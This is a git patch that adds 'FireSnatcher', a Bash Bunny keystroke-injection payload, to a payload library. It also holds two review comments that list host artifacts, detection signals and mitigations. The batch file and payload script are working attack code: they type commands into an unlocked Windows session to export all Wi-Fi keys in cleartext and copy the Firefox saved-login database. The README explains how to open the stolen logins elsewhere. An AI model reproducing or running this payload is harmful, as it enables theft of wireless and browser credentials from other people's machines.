From f12c486e122e1fb37340538a7909269b152d8ff6 Mon Sep 17 00:00:00 2001
From: KarrotKak3 <104325530+KarrotKak3@users.noreply.github.com>
Date: Fri, 29 Apr 2022 19:05:40 -0400
Subject: [PATCH] Add files via upload (#518) New Payload. FireSnatcher
---
.../credentials/FireSnatcher/FireSnatcher.bat | 6 ++
.../credentials/FireSnatcher/README.md | 45 +++++++++++
.../credentials/FireSnatcher/payload.txt | 78 +++++++++++++++++++
3 files changed, 129 insertions(+)
create mode 100644 payloads/library/credentials/FireSnatcher/FireSnatcher.bat
create mode 100644 payloads/library/credentials/FireSnatcher/README.md
create mode 100644 payloads/library/credentials/FireSnatcher/payload.txt
diff --git a/payloads/library/credentials/FireSnatcher/FireSnatcher.bat b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat
new file mode 100644
index 00000000..d08c8229
--- /dev/null
+++ b/payloads/library/credentials/FireSnatcher/FireSnatcher.bat
@@ -0,0 +1,6 @@
+mkdir %~dp0\loot\%COMPUTERNAME%
+cd /D %~dp0\loot\%COMPUTERNAME% && netsh wlan export profile key=clear
+C: cd \D %appdata%\mozilla\firefox\profiles\
+cd %appdata%\mozilla\firefox\profiles\*.default-release\
+copy key4.db %~dp0\loot\%COMPUTERNAME%
+copy logins.json %~dp0\loot\%COMPUTERNAME%
\ No newline at end of file
diff --git a/payloads/library/credentials/FireSnatcher/README.md b/payloads/library/credentials/FireSnatcher/README.md
new file mode 100644
index 00000000..1d3b0dd0
--- /dev/null
+++ b/payloads/library/credentials/FireSnatcher/README.md
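Review bot: FireSnatcher.bat has no header comment saying what it writes, and everything it collects lands unencrypted in `loot\%COMPUTERNAME%` on the device: `netsh wlan export profile key=clear` asks for profile XML with the keys readable, and `key4.db` plus `logins.json` together are the Firefox saved-login store. I would add a header such as `REM Output: cleartext WLAN profile XML, key4.db and logins.json under loot\<hostname>; the storage then holds live credentials` so anyone handling the device after a test knows what is on it. For a blue team reading this payload, the useful signals are a process-creation event for netsh carrying `export profile key=clear` and a process other than Firefox reading those two profile files. A Firefox Primary Password keeps the copied store from being opened without that password, which is worth stating in the README as the mitigation.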
@@ -0,0 +1,45 @@
+# Title: FireSnatcher
+# Description: Copies Wifi Keys, and Firefox Password Databases
+# Author: KarrotKak3
+# Props: saintcrossbow & 0iphor13
+# Version: 1.0.2.0 (Work in Progress)
+# Category: Credentials
+# Target: Windows (Logged in)
+# Attackmodes: HID, Storage
+
+# Full Description
+# ----------------
+# Attacks an Unlocked Windows Machine
+# Payload targets:
+# - All WiFi creds
+# - Firefox Saved Password Database
+#
+# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
+# Delays to Allow Powershell Time to Open and to Give Attack time to Run
+
+# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
+# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
+# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
+
+
+# KNOWN ISSUES
+# ---------------
+# Loot is saved in Payloads/switch#/loot
+
+
+# Files
+# -----
+# - payload.txt: Starts the attack. All configuration contained in this file.
+# - FireSnatcher.bat: Worker that grabs Creds
+
+
+# Setup
+# -----
+# - Place the payload.txt and FireSnatcher.bat in Payload folder
+# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
+# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
+
+**LED meanings**
+- Magenta: Initial setup – about 1 – 3 seconds
+- Single yellow blink: Attack in progress
+- Green rapid flash, then solid, then off: Attack complete
diff --git a/payloads/library/credentials/FireSnatcher/payload.txt b/payloads/library/credentials/FireSnatcher/payload.txt
new file mode 100644
index 00000000..143efd55
--- /dev/null
+++ b/payloads/library/credentials/FireSnatcher/payload.txt
@@ -0,0 +1,78 @@
+# Title: FireSnatcher
+# Description: Copies Wifi Keys, and Firefox Password Databases
+# Author: KarrotKak3
+# Props: saintcrossbow & 0iphor13
+# Version: 1.0.2.0 (Work in Progress)
+# Category: Credentials
+# Target: Windows (Logged in)
+# Attackmodes: HID, Storage
+
+# Full Description
+# ----------------
+# Attacks an Unlocked Windows Machine
+# Payload targets:
+# - All WiFi creds
+# - Firefox Saved Password Database
+#
+# PAYLOAD RUNS START TO FINISH IN ABOUT 20 SEC
+# Delays to Allow Powershell Time to Open and to Give Attack time to Run
+
+# HOW TO USE PASSWORD DB: COPY KEY4.DB AND LOGINS.JSON TO YOUR COMPUTER AT
+# %APPDATA%\MOZILLA\FIREFOX\PROFILES\*.DEFAULT-RELEASE
+# Open Firefox and find loot in Settings-> Privacy & Security -> Saved Logins
+
+
+# KNOWN ISSUES
+# ---------------
+# Loot is saved in Payloads/switch#/loot
+
+
+# Files
+# -----
+# - payload.txt: Starts the attack. All configuration contained in this file.
+# - FireSnatcher.bat: Worker that grabs Creds
+
+
+# Setup
+# -----
+# - Place the payload.txt and FireSnatcher.bat in Payload folder
+# - If you are using a SD card, copy FireSnatcher.bat under /payloads/switchn/ (where n is the switch you are running)
+# - Good idea to have the Bunny ready to copy to either the device or SD for maximum versatility
+
+# LEDs
+# ----
+# Magenta: Initial setup – about 1 – 3 seconds
+# Single yellow blink: Attack in progress
+# Green rapid flash, then solid, then off: Attack complete – Bash Bunny may be removed
+
+# Options
+# -------
+# Name of Bash Bunny volume that appears to Windows (BashBunny is default)
+BB_NAME="BashBunny"
+
+# Setup
+# -----
+LED SETUP
+
+
+# Attack
+# ------
+ATTACKMODE HID STORAGE
+Q DELAY 500
+LED ATTACK
+Q DELAY 100
+Q GUI r
+Q DELAY 100
+Q STRING powershell Start-Process powershell
+Q ENTER
+Q DELAY 7000
+Q STRING "iex((gwmi win32_volume -f 'label=''BashBunny''').Name+'\payloads\\$SWITCH_POSITION\FireSnatcher.bat')"
+Q ENTER
+Q DELAY 8000
+Q STRING EXIT
+Q ENTER
+sync
+LED FINISH
+Q DELAY 1500
+shutdown now
+
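Review bot: The comment header of payload.txt explains how to reuse the loot but says nothing about what the run leaves on the tested host, which is what an engagement report or a responder needs. The typed sequence (`Q GUI r`, `Q STRING powershell Start-Process powershell`, then the `iex(...)` line) should leave a Run-dialog history entry, a PowerShell process whose parent is explorer.exe, and the `gwmi win32_volume` / `iex` command in PSReadLine history and, where script block logging is enabled, in the PowerShell operational log. I would add a section next to KNOWN ISSUES along the lines of `# Host artifacts: Run dialog history, PSReadLine history, script block log entry for the iex line`. Because the payload depends on an unlocked session and on the host accepting a new keyboard and storage device (`ATTACKMODE HID STORAGE`), workstation locking and removable-device control are the mitigations the README should name.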